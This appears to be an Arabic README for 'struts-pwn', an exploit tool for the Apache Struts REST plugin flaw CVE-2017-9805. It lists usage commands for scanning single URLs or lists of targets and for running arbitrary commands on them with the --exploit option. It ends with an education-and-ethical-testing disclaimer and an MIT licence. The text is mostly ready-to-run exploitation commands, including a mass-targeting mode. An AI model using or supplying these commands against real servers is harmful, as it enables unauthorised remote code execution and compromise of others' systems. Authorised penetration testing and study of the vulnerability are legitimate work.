
استغلال لـ Apache Struts CVE-2017-9805
python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
python struts-pwn.py --list 'urls.txt'
python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'
python struts-pwn.py --exploit --list 'urls.txt' -c 'touch /tmp/struts-pwn'

صُنع هذا المشروع لأغراض تعليمية واختبارات أخلاقية فقط. يُعد استخدام struts-pwn لمهاجمة الأهداف دون موافقة متبادلة مسبقة أمرًا غير قانوني. تقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يُعتبرون مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
المشروع مرخّص بموجب رخصة MIT.
مازن أحمد